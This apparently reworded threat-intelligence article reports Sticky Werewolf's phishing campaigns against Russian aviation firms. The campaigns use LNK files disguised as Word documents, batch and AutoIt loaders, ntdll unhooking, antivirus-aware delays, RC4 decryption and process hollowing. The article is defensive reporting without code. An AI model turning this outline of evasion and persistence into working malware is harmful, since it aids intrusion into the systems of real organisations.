Sticky Werewolf, a notorious cyber threat group, has recently altered its modus operandi by pivoting from the traditional method of dispatching phishing emails with download links to hazardous files to a more sophisticated technique. This new approach involves using archive attachments containing LNK files that serve as shortcuts to malicious executables hosted on WebDAV servers.
When a recipient of these deceptive emails falls prey to the temptation of clicking on the LNK file, a chain of events is set in motion. Initially, a batch script is triggered, which then launches an AutoIt script specially crafted to deliver the final payload. This intricate scheme bypasses conventional phishing methods and directly injects malware into the user’s system upon execution of the LNK file.
The cyberespionage group, Sticky Werewolf, has set its sights on the aviation industry, employing phishing emails disguised as business invitations from a reputable Russian aerospace company, AO OKB Kristall. These emails contain an archive attachment housing two malicious LNK files masquerading as DOCX documents, along with a decoy PDF file to divert attention.
Clicking on the nefarious LNK files initiates a Batch script that invokes an AutoIt script, culminating in the deployment of the final malicious payload. This marks a departure from Sticky Werewolf’s previous tactics of utilizing links to download malware directly from file-sharing platforms, showcasing the group’s evolving sophistication and adaptability.
Another facet of Sticky Werewolf’s clandestine operations involves targeting enterprises associated with Russian helicopters through a deceptive phishing email with a decoy PDF attachment. The PDF references a video conference and includes two disguised LNK files posing as meeting documents.
Executing these malicious LNK files triggers an NSIS self-extracting archive, a variant of the CypherIT crypter, to download and execute a malevolent executable from a network share. The extracted files are deposited into the Internet Explorer temporary files directory, after which a batch script is executed to further the malicious agenda.
The rogue LNK files, cloaked as Word documents, are designed to lure unsuspecting users into a trap. Clicking on either LNK file sets off a sequence of actions: the registry entry is manipulated to initiate a compromised WINWORD.exe persistently upon login, distracting error messages are displayed, and deceptive image files are copied to obfuscate the true intentions of the malware.
To avoid detection, a batch script within the LNK file selectively delays execution in the presence of specific antivirus processes and dynamically renames files. The script ultimately merges a legitimate AutoIt executable with a malicious script to execute them covertly, evading security measures.
The malicious AutoIT script is engineered to elude detection mechanisms, establish persistence, and thwart security environments and debugging tools. By injecting a clean version of ntdll.dll to bypass hooking and creating scheduled tasks or modifying the startup directory, the malware achieves persistence and decrypts the hidden payload using a two-stage RC4 process with a user-defined passphrase.
Morphisec reports that the decrypted payload is decompressed and injected into a legitimate AutoIT process via process hollowing, making it exceedingly challenging to detect. This stealthy infiltration technique underscores the sophisticated tactics employed by Sticky Werewolf in orchestrating their malevolent activities.
In conclusion, Sticky Werewolf’s adaptation of its targeting strategy to encompass sophisticated techniques involving deceptive LNK files showcases the group’s relentless pursuit of evading detection and maximizing the impact of their cyber attacks. As organizations grapple with increasingly sophisticated cyber threats, it is imperative to remain vigilant and adopt robust cybersecurity measures to safeguard against such insidious campaigns.